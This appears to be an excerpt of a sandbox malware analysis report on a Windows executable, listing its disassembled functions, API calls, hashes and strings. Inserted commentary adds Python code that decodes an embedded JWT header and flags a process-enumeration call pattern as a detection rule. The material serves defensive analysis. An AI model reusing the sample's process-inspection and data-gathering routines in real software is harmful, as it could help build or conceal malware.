                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: b0dd89080014f609c63fb1b3b13520bf307fc37912dbfcbfd5ae9452f9bcd768
                            • Instruction ID: 696b36a2f147642e5e419a5635c02caf7062c51d986257aa5517afde56c314d9
                            • Opcode Fuzzy Hash: b0dd89080014f609c63fb1b3b13520bf307fc37912dbfcbfd5ae9452f9bcd768
                            • Instruction Fuzzy Hash: 11118272A04208AFD710DB99DC45FBBB7BCE749B11F00411AFA05E3680DB75590487A1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 7b1c94b94bbede5ed95e47164b7813987f096b8f1c3143bd8e0ad8396f354928
                            • Instruction ID: e8549ff9ade671072e93dd1bcaa7d5d9c8a17fc08f905a0ec63399fba8f6c043
                            • Opcode Fuzzy Hash: 7b1c94b94bbede5ed95e47164b7813987f096b8f1c3143bd8e0ad8396f354928
                            • Instruction Fuzzy Hash: C641E67050475CAEDB219B248C99FFBBBFC9B45704F5C44E8E9C686182E2719A458F34
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D68996
                              • Part of subcall function 00D8A1C0: std::exception::exception.LIBCMT ref: 00D8A1D5
                              • Part of subcall function 00D8A1C0: std::exception::exception.LIBCMT ref: 00D8A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D689CD
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A188
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: 617fb4c91de7f16c0e1d669ebf9ab16b6911689638b23ac65886207bc45ea9be
                            • Instruction ID: f3bd2ba6c6ed7fb4c178695dffec8efe16ae61a684b69bab0993fad4e140727a
                            • Opcode Fuzzy Hash: 617fb4c91de7f16c0e1d669ebf9ab16b6911689638b23ac65886207bc45ea9be
                            • Instruction Fuzzy Hash: A921A3723006509BCB20DAACE840A6AF7E9DBA1761B250B3FF551CB281CB71D841D7B6
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D68883
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A188
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: c6a438dbf9bc06480adb9813c0b593e1425ab5cefef4e7895af6f2b08c1ad208
                            • Instruction ID: d99fbe3bec9a8d13db2304d1c8b3293f4d417cb2d1346c0ed64c75af0c428ffe
                            • Opcode Fuzzy Hash: c6a438dbf9bc06480adb9813c0b593e1425ab5cefef4e7895af6f2b08c1ad208
                            • Instruction Fuzzy Hash: 4A3197B5E005159FCB08DF58C8916ADBBB6EB98350F188269E915AB345DB30AD01CBA1
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D85922
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A188
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A1AE
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D85935
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
                            • Opcode ID: 6c00d805cc6169a6697abf4bb1f9f92f9376fe640c8416b0ccfecd51bf6726f3
                            • Instruction ID: 8003766c8a68f5bc943c5693a8fe6987e810e268a55e27c3484f433ad3d55863
                            • Opcode Fuzzy Hash: 6c00d805cc6169a6697abf4bb1f9f92f9376fe640c8416b0ccfecd51bf6726f3
                            • Instruction Fuzzy Hash: F7113C31304B41CBD721BF2CF800B1AB7E5AB92761F250A9AE0D187699D761D845CBB5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00D8A430,000000FF), ref: 00D83D20
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D83D27
                            • wsprintfA.USER32 ref: 00D83D37
                              • Part of subcall function 00D871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00D871FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: dfc1432237d392233f5bd69fb32dcf6dd1f8170b24824f7d20027feb96d89714
                            • Instruction ID: 184f49e1ae1c8d13dbbe332b5ae02aa08b2176dea94fa772be6828dbf39578fc
                            • Opcode Fuzzy Hash: dfc1432237d392233f5bd69fb32dcf6dd1f8170b24824f7d20027feb96d89714
                            • Instruction Fuzzy Hash: 1F01C471648308BFE7105B69DC0AF6A7B68FB46B61F10011AFA15972E0C7F51900CBB1
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D68737
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A188
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: ca84334a0bd3e8a78e4c7fdb25ca725d84aa56d940480fae2a4e1f7547eae674
                            • Instruction ID: 4e594c0fc2460dc9b4311472f5926cfa709fbd94c7068bfdf622652b5dee4f55
                            • Opcode Fuzzy Hash: ca84334a0bd3e8a78e4c7fdb25ca725d84aa56d940480fae2a4e1f7547eae674
                            • Instruction Fuzzy Hash: F1F0B437F400310F8354643D9D8445EA94796E539033ED765E85AEF359DC70EC82A6F5
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7E544
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E573
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E581
                            • lstrcat.KERNEL32(?,00BFDA80), ref: 00D7E59C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 20698046169e449a9e6c53c38d003a80078f6fefff3213d3ede451b700c177e5
                            • Instruction ID: 3212bec2375bb338df63427bd3ed11440ec721a16d81838b50e02afca172e748
                            • Opcode Fuzzy Hash: 20698046169e449a9e6c53c38d003a80078f6fefff3213d3ede451b700c177e5
                            • Instruction Fuzzy Hash: 3D518275A5010CAFD755EB64DC42EFE3379FB88340F18449ABA1A97241EA70AE458BB0
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00D81FDF, 00D81FF5, 00D820B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            • Opcode ID: 8b683511eebeb918cc60e7a640c81a67011a8a813452352c9843c5aaa1cbe26e
                            • Instruction ID: cdd2a612216ea3044a84481ff5ae56d0423ecbb9b0e3af8b083ad995ba3b6a5d
                            • Opcode Fuzzy Hash: 8b683511eebeb918cc60e7a640c81a67011a8a813452352c9843c5aaa1cbe26e
                            • Instruction Fuzzy Hash: 7F210A3551028A9FDB20FE35C4456FDF7A6EF80361F884056C8594B282E336590AD7B6
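The hex dump in the Strings entry of the record above (xrefs 00D81FDF, 00D81FF5, 00D820B7) is printable ASCII. Decoding it, as an added example that is not part of the Joe Sandbox report or of the sample's code, shows it is an unpadded base64url segment which in turn decodes to the JSON `{ "typ": "JWT", "alg": "EdDSA" }`, i.e. a JSON Web Token header. The helper below parses the report's space-separated hex format, restores the padding that JWT segments omit, and decodes; the three-segment token built at the end, with its payload and all-zero signature, is constructed here to exercise the general header.payload.signature case and is not from the sample.

```python
import base64
import json

# Hex dump exactly as the report prints it for xrefs 00D81FDF / 00D81FF5 / 00D820B7.
REPORT_HEX = (
    "65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 "
    "62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30"
)


def hexdump_to_bytes(dump: str) -> bytes:
    """Convert a space-separated hex dump (the report's string format) to raw bytes."""
    return bytes(int(tok, 16) for tok in dump.split())


def b64url_decode(segment: str) -> bytes:
    """Decode base64url without padding, the way JWT segments are encoded (RFC 7515)."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data: bytes) -> str:
    """Inverse of b64url_decode: base64url with the '=' padding stripped."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def decode_jwt_parts(token: str) -> dict:
    """Decode a lone header segment or a full header.payload.signature token.
    JSON segments are parsed; the signature is returned as raw bytes and is
    never verified here (we have no key, and this is triage, not validation)."""
    parts = token.split(".")
    out = {"header": json.loads(b64url_decode(parts[0]))}
    if len(parts) == 3:
        out["payload"] = json.loads(b64url_decode(parts[1]))
        out["signature"] = b64url_decode(parts[2])
    elif len(parts) != 1:
        raise ValueError(f"unexpected number of JWT segments: {len(parts)}")
    return out


def decode_report_string(dump: str) -> dict:
    """Full path from the report's hex dump to the decoded JWT header."""
    ascii_text = hexdump_to_bytes(dump).decode("ascii")
    return {"ascii": ascii_text, **decode_jwt_parts(ascii_text)}


# Constructed token (not from the sample): the report's header joined with a
# made-up payload and a dummy 64-byte signature, to show the three-segment path.
EXAMPLE_TOKEN = ".".join([
    hexdump_to_bytes(REPORT_HEX).decode("ascii"),
    b64url_encode(json.dumps({"sub": "example", "iat": 0}).encode()),
    b64url_encode(b"\x00" * 64),
])


if __name__ == "__main__":
    print(decode_report_string(REPORT_HEX))
    print(decode_jwt_parts(EXAMPLE_TOKEN)["payload"])
```

The same two helpers handle any other hex-dumped string in the report: run hexdump_to_bytes on it first and only try b64url_decode if the result is printable ASCII, since a JSON object with the key "alg" is what distinguishes a JWT header from an arbitrary base64 blob.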
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7EBB4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7EBE3
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7EBF1
                            • lstrcat.KERNEL32(?,00BFE2B8), ref: 00D7EC0C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: f5c83a85b576383f1840328d4b331e93c3ac336ee5f646a7ac77b417ff021e2f
                            • Instruction ID: b30454e63a807b7b089b40a99a4c2e92aaed85857828bfa5c7efcd43d7f79e16
                            • Opcode Fuzzy Hash: f5c83a85b576383f1840328d4b331e93c3ac336ee5f646a7ac77b417ff021e2f
                            • Instruction Fuzzy Hash: 9F31A471A5111CABCB25EFA8DC52BED77B4EF48300F1444A9BA1AD7250DE70AE448BB0
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 00D84492
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00D844AD
                            • CloseHandle.KERNEL32(00000000), ref: 00D844B4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D844E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            • Opcode ID: 225054a7bf4274f2d31daa8162b7f175930dc17f7465f57f272a366a41a6b7d6
                            • Instruction ID: bc12bf6492db0f353ac4696efc68d330b5ebcc79ac5c3184fb7b0d1bac948dfa
                            • Opcode Fuzzy Hash: 225054a7bf4274f2d31daa8162b7f175930dc17f7465f57f272a366a41a6b7d6
                            • Instruction Fuzzy Hash: F9F0FCB090161A2BE720AB789C4DBE6B7A8EF14304F040595FA45D7180EBF08D808BA0
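The OpenProcess / GetModuleFileNameExA / CloseHandle sequence in the record above is the standard way to read another process's image path: the first argument 0x410 is PROCESS_QUERY_INFORMATION (0x400) | PROCESS_VM_READ (0x10), the minimum GetModuleFileNameEx needs on the target. The following is an added example, not code from the report or from the sample, that parses the report's APIs lines, decodes the access mask with the constants from winnt.h, and flags that sequence as a remote image-path lookup; the four input lines are copied from this record, the regex and the sequence rule are mine.

```python
import re

# The four "APIs" lines of the record above, copied from the report.
REPORT_API_LINES = """
OpenProcess.KERNEL32(00000410,00000000), ref: 00D84492
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00D844AD
CloseHandle.KERNEL32(00000000), ref: 00D844B4
lstrcpy.KERNEL32(00000000,?), ref: 00D844E7
"""

# Process access rights (winnt.h), bit value -> name.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# "Name.MODULE(arg,arg,...), ref: ADDR". The argument list is optional because
# CRT entries such as "std::_Xinvalid_argument.LIBCPMT ref: 00D85922" print none.
API_RE = re.compile(
    r"(?P<api>[\w:]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


def parse_api_lines(text: str) -> list:
    """Turn the report's APIs lines into dicts; unknown arguments stay as '?'."""
    calls = []
    for m in API_RE.finditer(text):
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
        calls.append({"api": m.group("api"), "mod": m.group("mod"),
                      "args": args, "ref": m.group("ref")})
    return calls


def decode_process_access(mask: int) -> list:
    """Expand an OpenProcess dwDesiredAccess mask into flag names, low bit first;
    bits outside the table are reported rather than silently dropped."""
    names = [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]
    unknown = mask & ~sum(PROCESS_ACCESS)
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:X}")
    return names


def remote_image_path_lookups(calls: list) -> list:
    """Return the ref of every OpenProcess whose rights cover GetModuleFileNameEx
    and that is followed, before the handle is closed, by GetModuleFileNameExA/W."""
    hits, pending = [], None
    for c in calls:
        if c["api"] == "OpenProcess" and c["args"] and c["args"][0] != "?":
            rights = decode_process_access(int(c["args"][0], 16))
            needed = {"PROCESS_QUERY_INFORMATION", "PROCESS_VM_READ"}
            pending = c["ref"] if needed <= set(rights) else None
        elif c["api"] in ("GetModuleFileNameExA", "GetModuleFileNameExW") and pending:
            hits.append(pending)
            pending = None
        elif c["api"] == "CloseHandle":
            pending = None
    return hits


if __name__ == "__main__":
    calls = parse_api_lines(REPORT_API_LINES)
    print(decode_process_access(int(calls[0]["args"][0], 16)))
    print(remote_image_path_lookups(calls))
```

The rule deliberately requires both rights: an OpenProcess with only PROCESS_QUERY_LIMITED_INFORMATION (enough for QueryFullProcessImageName) or with PROCESS_VM_WRITE (an injection candidate rather than an enumeration one) is not the pattern this record shows, and the sequence check keeps a lone GetModuleFileNameExA on the caller's own handle from matching.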
                            APIs
                            • __getptd.LIBCMT ref: 00D88FDD
                              • Part of subcall function 00D887FF: __amsg_exit.LIBCMT ref: 00D8880F
                            • __getptd.LIBCMT ref: 00D88FF4
                            • __amsg_exit.LIBCMT ref: 00D89002
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00D89026
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 8f5f0e86677490197139a1e44b53174334778574f812cc931e834e06c1264719
                            • Instruction ID: 109aed43e6b24125e71e4e8bfb3dc28f84b9b35c511b68587be1d01849946778
                            • Opcode Fuzzy Hash: 8f5f0e86677490197139a1e44b53174334778574f812cc931e834e06c1264719
                            • Instruction Fuzzy Hash: D6F09032948710DBDB61BB789806B6D73B0EF00720F794209F484AA2D2DF649940EBB9
                            APIs
                            • lstrlen.KERNEL32(------,00D65BEB), ref: 00D8731B
                            • lstrcpy.KERNEL32(00000000), ref: 00D8733F
                            • lstrcat.KERNEL32(?,------), ref: 00D87349
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: b05c61b27685828d6b91b87e17e263c17e17765879d277f1f0e1c7712db4a63a
                            • Instruction ID: 1eb0148aaf20560d56fe30445f5d78674afbf550b9ee534022dff4317e0d5f55
                            • Opcode Fuzzy Hash: b05c61b27685828d6b91b87e17e263c17e17765879d277f1f0e1c7712db4a63a
                            • Instruction Fuzzy Hash: C9F0E5746157029FDB64AF35D848927B7F9EF9570132C881EACEAC7214E730D841DB20
                            APIs
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D73422
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7344B
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D73471
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D73497
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D77C94
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D77CAF
                              • Part of subcall function 00D77D40: std::_Xinvalid_argument.LIBCPMT ref: 00D77D58
                              • Part of subcall function 00D77D40: std::_Xinvalid_argument.LIBCPMT ref: 00D77D76
                              • Part of subcall function 00D77D40: std::_Xinvalid_argument.LIBCPMT ref: 00D77D91
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00D66F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D66F7B
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D8244C
                            • lstrlen.KERNEL32(00000000), ref: 00D824E9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D82570
                            • lstrlen.KERNEL32(00000000), ref: 00D82577
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00D815A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D815D9
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D81611
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D81649
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            APIs
                              • Part of subcall function 00D61610: lstrcpy.KERNEL32(00000000), ref: 00D6162D
                              • Part of subcall function 00D61610: lstrcpy.KERNEL32(00000000,?), ref: 00D6164F
                              • Part of subcall function 00D61610: lstrcpy.KERNEL32(00000000,?), ref: 00D61671
                              • Part of subcall function 00D61610: lstrcpy.KERNEL32(00000000,?), ref: 00D61693
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00D6162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61671
